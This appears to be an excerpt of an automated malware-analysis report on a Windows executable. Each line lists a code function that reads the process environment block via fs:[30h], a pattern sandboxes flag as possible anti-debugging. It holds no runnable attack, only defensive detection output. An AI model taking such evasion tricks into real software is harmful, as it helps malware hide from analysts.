    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35943720 mov eax, dword ptr fs:[00000030h]4_2_35943720
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3595F720 mov eax, dword ptr fs:[00000030h]4_2_3595F720
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3595F720 mov eax, dword ptr fs:[00000030h]4_2_3595F720
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3595F720 mov eax, dword ptr fs:[00000030h]4_2_3595F720
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359E375F mov eax, dword ptr fs:[00000030h]4_2_359E375F
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359E375F mov eax, dword ptr fs:[00000030h]4_2_359E375F
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359E375F mov eax, dword ptr fs:[00000030h]4_2_359E375F
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359E375F mov eax, dword ptr fs:[00000030h]4_2_359E375F
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359E375F mov eax, dword ptr fs:[00000030h]4_2_359E375F
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35953740 mov eax, dword ptr fs:[00000030h]4_2_35953740
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35953740 mov eax, dword ptr fs:[00000030h]4_2_35953740
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35953740 mov eax, dword ptr fs:[00000030h]4_2_35953740
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35A13749 mov eax, dword ptr fs:[00000030h]4_2_35A13749
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3593B765 mov eax, dword ptr fs:[00000030h]4_2_3593B765
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3593B765 mov eax, dword ptr fs:[00000030h]4_2_3593B765
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3593B765 mov eax, dword ptr fs:[00000030h]4_2_3593B765
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3593B765 mov eax, dword ptr fs:[00000030h]4_2_3593B765
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359C368C mov eax, dword ptr fs:[00000030h]4_2_359C368C
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359C368C mov eax, dword ptr fs:[00000030h]4_2_359C368C
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359C368C mov eax, dword ptr fs:[00000030h]4_2_359C368C
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359C368C mov eax, dword ptr fs:[00000030h]4_2_359C368C
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359376B2 mov eax, dword ptr fs:[00000030h]4_2_359376B2
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359376B2 mov eax, dword ptr fs:[00000030h]4_2_359376B2
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359376B2 mov eax, dword ptr fs:[00000030h]4_2_359376B2
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3593D6AA mov eax, dword ptr fs:[00000030h]4_2_3593D6AA
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3593D6AA mov eax, dword ptr fs:[00000030h]4_2_3593D6AA
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3594B6C0 mov eax, dword ptr fs:[00000030h]4_2_3594B6C0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3594B6C0 mov eax, dword ptr fs:[00000030h]4_2_3594B6C0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3594B6C0 mov eax, dword ptr fs:[00000030h]4_2_3594B6C0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3594B6C0 mov eax, dword ptr fs:[00000030h]4_2_3594B6C0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3594B6C0 mov eax, dword ptr fs:[00000030h]4_2_3594B6C0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3594B6C0 mov eax, dword ptr fs:[00000030h]4_2_3594B6C0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359FF6C7 mov eax, dword ptr fs:[00000030h]4_2_359FF6C7
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359716CF mov eax, dword ptr fs:[00000030h]4_2_359716CF
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35A016CC mov eax, dword ptr fs:[00000030h]4_2_35A016CC
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35A016CC mov eax, dword ptr fs:[00000030h]4_2_35A016CC
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35A016CC mov eax, dword ptr fs:[00000030h]4_2_35A016CC
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35A016CC mov eax, dword ptr fs:[00000030h]4_2_35A016CC
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359FD6F0 mov eax, dword ptr fs:[00000030h]4_2_359FD6F0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359D36EE mov eax, dword ptr fs:[00000030h]4_2_359D36EE
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359D36EE mov eax, dword ptr fs:[00000030h]4_2_359D36EE
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359D36EE mov eax, dword ptr fs:[00000030h]4_2_359D36EE
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359D36EE mov eax, dword ptr fs:[00000030h]4_2_359D36EE
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359D36EE mov eax, dword ptr fs:[00000030h]4_2_359D36EE
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359D36EE mov eax, dword ptr fs:[00000030h]4_2_359D36EE
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3596D6E0 mov eax, dword ptr fs:[00000030h]4_2_3596D6E0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3596D6E0 mov eax, dword ptr fs:[00000030h]4_2_3596D6E0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359736EF mov eax, dword ptr fs:[00000030h]4_2_359736EF
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35943616 mov eax, dword ptr fs:[00000030h]4_2_35943616
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35943616 mov eax, dword ptr fs:[00000030h]4_2_35943616
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35971607 mov eax, dword ptr fs:[00000030h]4_2_35971607
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3597F603 mov eax, dword ptr fs:[00000030h]4_2_3597F603
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35A15636 mov eax, dword ptr fs:[00000030h]4_2_35A15636
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3593F626 mov eax, dword ptr fs:[00000030h]4_2_3593F626
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3593F626 mov eax, dword ptr fs:[00000030h]4_2_3593F626
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3593F626 mov eax, dword ptr fs:[00000030h]4_2_3593F626
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3593F626 mov eax, dword ptr fs:[00000030h]4_2_3593F626
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3593F626 mov eax, dword ptr fs:[00000030h]4_2_3593F626
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3593F626 mov eax, dword ptr fs:[00000030h]4_2_3593F626
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3593F626 mov eax, dword ptr fs:[00000030h]4_2_3593F626
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3593F626 mov eax, dword ptr fs:[00000030h]4_2_3593F626
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3593F626 mov eax, dword ptr fs:[00000030h]4_2_3593F626
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35979660 mov eax, dword ptr fs:[00000030h]4_2_35979660
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35979660 mov eax, dword ptr fs:[00000030h]4_2_35979660
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359DD660 mov eax, dword ptr fs:[00000030h]4_2_359DD660
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35997190 mov eax, dword ptr fs:[00000030h]4_2_35997190
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359F5180 mov eax, dword ptr fs:[00000030h]4_2_359F5180
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359F5180 mov eax, dword ptr fs:[00000030h]4_2_359F5180
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3595B1B0 mov eax, dword ptr fs:[00000030h]4_2_3595B1B0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359F11A4 mov eax, dword ptr fs:[00000030h]4_2_359F11A4
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359F11A4 mov eax, dword ptr fs:[00000030h]4_2_359F11A4
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359F11A4 mov eax, dword ptr fs:[00000030h]4_2_359F11A4
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359F11A4 mov eax, dword ptr fs:[00000030h]4_2_359F11A4
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35A131E1 mov eax, dword ptr fs:[00000030h]4_2_35A131E1
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3597D1D0 mov eax, dword ptr fs:[00000030h]4_2_3597D1D0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3597D1D0 mov ecx, dword ptr fs:[00000030h]4_2_3597D1D0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359E71F9 mov esi, dword ptr fs:[00000030h]4_2_359E71F9
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35A151CB mov eax, dword ptr fs:[00000030h]4_2_35A151CB
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359651EF mov eax, dword ptr fs:[00000030h]4_2_359651EF
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359651EF mov eax, dword ptr fs:[00000030h]4_2_359651EF
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359651EF mov eax, dword ptr fs:[00000030h]4_2_359651EF
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359651EF mov eax, dword ptr fs:[00000030h]4_2_359651EF
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359651EF mov eax, dword ptr fs:[00000030h]4_2_359651EF
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359651EF mov eax, dword ptr fs:[00000030h]4_2_359651EF
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359651EF mov eax, dword ptr fs:[00000030h]4_2_359651EF
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359651EF mov eax, dword ptr fs:[00000030h]4_2_359651EF
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359651EF mov eax, dword ptr fs:[00000030h]4_2_359651EF
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359651EF mov eax, dword ptr fs:[00000030h]4_2_359651EF
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359651EF mov eax, dword ptr fs:[00000030h]4_2_359651EF
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359651EF mov eax, dword ptr fs:[00000030h]4_2_359651EF
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359651EF mov eax, dword ptr fs:[00000030h]4_2_359651EF
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359451ED mov eax, dword ptr fs:[00000030h]4_2_359451ED
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35A17120 mov eax, dword ptr fs:[00000030h]4_2_35A17120
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35941131 mov eax, dword ptr fs:[00000030h]4_2_35941131
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35941131 mov eax, dword ptr fs:[00000030h]4_2_35941131
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3593B136 mov eax, dword ptr fs:[00000030h]4_2_3593B136
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3593B136 mov eax, dword ptr fs:[00000030h]4_2_3593B136
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3593B136 mov eax, dword ptr fs:[00000030h]4_2_3593B136
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3593B136 mov eax, dword ptr fs:[00000030h]4_2_3593B136
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35947152 mov eax, dword ptr fs:[00000030h]4_2_35947152
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35939148 mov eax, dword ptr fs:[00000030h]4_2_35939148
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35939148 mov eax, dword ptr fs:[00000030h]4_2_35939148
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35939148 mov eax, dword ptr fs:[00000030h]4_2_35939148
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35939148 mov eax, dword ptr fs:[00000030h]4_2_35939148
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359D3140 mov eax, dword ptr fs:[00000030h]4_2_359D3140
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359D3140 mov eax, dword ptr fs:[00000030h]4_2_359D3140
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359D3140 mov eax, dword ptr fs:[00000030h]4_2_359D3140
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3593F172 mov eax, dword ptr fs:[00000030h]4_2_3593F172
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3593F172 mov eax, dword ptr fs:[00000030h]4_2_3593F172
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3593F172 mov eax, dword ptr fs:[00000030h]4_2_3593F172
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3593F172 mov eax, dword ptr fs:[00000030h]4_2_3593F172
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3593F172 mov eax, dword ptr fs:[00000030h]4_2_3593F172
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3593F172 mov eax, dword ptr fs:[00000030h]4_2_3593F172
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3593F172 mov eax, dword ptr fs:[00000030h]4_2_3593F172
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3593F172 mov eax, dword ptr fs:[00000030h]4_2_3593F172
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3593F172 mov eax, dword ptr fs:[00000030h]4_2_3593F172
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3593F172 mov eax, dword ptr fs:[00000030h]4_2_3593F172
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3593F172 mov eax, dword ptr fs:[00000030h]4_2_3593F172
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3593F172 mov eax, dword ptr fs:[00000030h]4_2_3593F172
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3593F172 mov eax, dword ptr fs:[00000030h]4_2_3593F172
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3593F172 mov eax, dword ptr fs:[00000030h]4_2_3593F172
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3593F172 mov eax, dword ptr fs:[00000030h]4_2_3593F172
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3593F172 mov eax, dword ptr fs:[00000030h]4_2_3593F172
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3593F172 mov eax, dword ptr fs:[00000030h]4_2_3593F172
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3593F172 mov eax, dword ptr fs:[00000030h]4_2_3593F172
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3593F172 mov eax, dword ptr fs:[00000030h]4_2_3593F172
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3593F172 mov eax, dword ptr fs:[00000030h]4_2_3593F172
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3593F172 mov eax, dword ptr fs:[00000030h]4_2_3593F172
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359D9179 mov eax, dword ptr fs:[00000030h]4_2_359D9179
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35A15152 mov eax, dword ptr fs:[00000030h]4_2_35A15152
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35945096 mov eax, dword ptr fs:[00000030h]4_2_35945096
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3596D090 mov eax, dword ptr fs:[00000030h]4_2_3596D090
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3596D090 mov eax, dword ptr fs:[00000030h]4_2_3596D090
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3597909C mov eax, dword ptr fs:[00000030h]4_2_3597909C
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359CD080 mov eax, dword ptr fs:[00000030h]4_2_359CD080
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359CD080 mov eax, dword ptr fs:[00000030h]4_2_359CD080
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3593D08D mov eax, dword ptr fs:[00000030h]4_2_3593D08D
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359690DB mov eax, dword ptr fs:[00000030h]4_2_359690DB
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359570C0 mov eax, dword ptr fs:[00000030h]4_2_359570C0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359570C0 mov ecx, dword ptr fs:[00000030h]4_2_359570C0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359570C0 mov ecx, dword ptr fs:[00000030h]4_2_359570C0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359570C0 mov eax, dword ptr fs:[00000030h]4_2_359570C0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359570C0 mov ecx, dword ptr fs:[00000030h]4_2_359570C0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359570C0 mov ecx, dword ptr fs:[00000030h]4_2_359570C0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359570C0 mov eax, dword ptr fs:[00000030h]4_2_359570C0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359570C0 mov eax, dword ptr fs:[00000030h]4_2_359570C0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359570C0 mov eax, dword ptr fs:[00000030h]4_2_359570C0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359570C0 mov eax, dword ptr fs:[00000030h]4_2_359570C0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359570C0 mov eax, dword ptr fs:[00000030h]4_2_359570C0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359570C0 mov eax, dword ptr fs:[00000030h]4_2_359570C0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359570C0 mov eax, dword ptr fs:[00000030h]4_2_359570C0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359570C0 mov eax, dword ptr fs:[00000030h]4_2_359570C0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359570C0 mov eax, dword ptr fs:[00000030h]4_2_359570C0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359570C0 mov eax, dword ptr fs:[00000030h]4_2_359570C0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359570C0 mov eax, dword ptr fs:[00000030h]4_2_359570C0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359570C0 mov eax, dword ptr fs:[00000030h]4_2_359570C0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359BD0C0 mov eax, dword ptr fs:[00000030h]4_2_359BD0C0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359BD0C0 mov eax, dword ptr fs:[00000030h]4_2_359BD0C0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359650E4 mov eax, dword ptr fs:[00000030h]4_2_359650E4
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359650E4 mov ecx, dword ptr fs:[00000030h]4_2_359650E4
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35A150D9 mov eax, dword ptr fs:[00000030h]4_2_35A150D9
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35A0903E mov eax, dword ptr fs:[00000030h]4_2_35A0903E
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35A0903E mov eax, dword ptr fs:[00000030h]4_2_35A0903E
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35A0903E mov eax, dword ptr fs:[00000030h]4_2_35A0903E
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35A0903E mov eax, dword ptr fs:[00000030h]4_2_35A0903E
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359E705E mov ebx, dword ptr fs:[00000030h]4_2_359E705E
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359E705E mov eax, dword ptr fs:[00000030h]4_2_359E705E
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35A15060 mov eax, dword ptr fs:[00000030h]4_2_35A15060
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3596B052 mov eax, dword ptr fs:[00000030h]4_2_3596B052
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35951070 mov eax, dword ptr fs:[00000030h]4_2_35951070
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35951070 mov ecx, dword ptr fs:[00000030h]4_2_35951070
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35951070 mov eax, dword ptr fs:[00000030h]4_2_35951070
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35951070 mov eax, dword ptr fs:[00000030h]4_2_35951070
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35951070 mov eax, dword ptr fs:[00000030h]4_2_35951070
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35951070 mov eax, dword ptr fs:[00000030h]4_2_35951070
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35951070 mov eax, dword ptr fs:[00000030h]4_2_35951070
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35951070 mov eax, dword ptr fs:[00000030h]4_2_35951070
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35951070 mov eax, dword ptr fs:[00000030h]4_2_35951070
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35951070 mov eax, dword ptr fs:[00000030h]4_2_35951070
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35951070 mov eax, dword ptr fs:[00000030h]4_2_35951070
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35951070 mov eax, dword ptr fs:[00000030h]4_2_35951070
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35951070 mov eax, dword ptr fs:[00000030h]4_2_35951070
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359BD070 mov ecx, dword ptr fs:[00000030h]4_2_359BD070
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359C106E mov eax, dword ptr fs:[00000030h]4_2_359C106E
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3599739A mov eax, dword ptr fs:[00000030h]4_2_3599739A
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3599739A mov eax, dword ptr fs:[00000030h]4_2_3599739A
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359E13B9 mov eax, dword ptr fs:[00000030h]4_2_359E13B9
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359E13B9 mov eax, dword ptr fs:[00000030h]4_2_359E13B9
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359E13B9 mov eax, dword ptr fs:[00000030h]4_2_359E13B9
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359633A5 mov eax, dword ptr fs:[00000030h]4_2_359633A5
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359733A0 mov eax, dword ptr fs:[00000030h]4_2_359733A0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359733A0 mov eax, dword ptr fs:[00000030h]4_2_359733A0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35A1539D mov eax, dword ptr fs:[00000030h]4_2_35A1539D
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359FB3D0 mov ecx, dword ptr fs:[00000030h]4_2_359FB3D0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35A153FC mov eax, dword ptr fs:[00000030h]4_2_35A153FC
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359FF3E6 mov eax, dword ptr fs:[00000030h]4_2_359FF3E6
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35A0132D mov eax, dword ptr fs:[00000030h]4_2_35A0132D
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35A0132D mov eax, dword ptr fs:[00000030h]4_2_35A0132D
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359C930B mov eax, dword ptr fs:[00000030h]4_2_359C930B
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359C930B mov eax, dword ptr fs:[00000030h]4_2_359C930B
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359C930B mov eax, dword ptr fs:[00000030h]4_2_359C930B
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35937330 mov eax, dword ptr fs:[00000030h]4_2_35937330
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3596F32A mov eax, dword ptr fs:[00000030h]4_2_3596F32A
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35939353 mov eax, dword ptr fs:[00000030h]4_2_35939353
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35939353 mov eax, dword ptr fs:[00000030h]4_2_35939353
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3593D34C mov eax, dword ptr fs:[00000030h]4_2_3593D34C
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3593D34C mov eax, dword ptr fs:[00000030h]4_2_3593D34C
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35A15341 mov eax, dword ptr fs:[00000030h]4_2_35A15341
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35947370 mov eax, dword ptr fs:[00000030h]4_2_35947370
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35947370 mov eax, dword ptr fs:[00000030h]4_2_35947370
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35947370 mov eax, dword ptr fs:[00000030h]4_2_35947370
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359E3370 mov eax, dword ptr fs:[00000030h]4_2_359E3370
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359FF367 mov eax, dword ptr fs:[00000030h]4_2_359FF367
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35A092A6 mov eax, dword ptr fs:[00000030h]4_2_35A092A6
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35A092A6 mov eax, dword ptr fs:[00000030h]4_2_35A092A6
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35A092A6 mov eax, dword ptr fs:[00000030h]4_2_35A092A6
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35A092A6 mov eax, dword ptr fs:[00000030h]4_2_35A092A6
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3597329E mov eax, dword ptr fs:[00000030h]4_2_3597329E
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3597329E mov eax, dword ptr fs:[00000030h]4_2_3597329E
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359C92BC mov eax, dword ptr fs:[00000030h]4_2_359C92BC
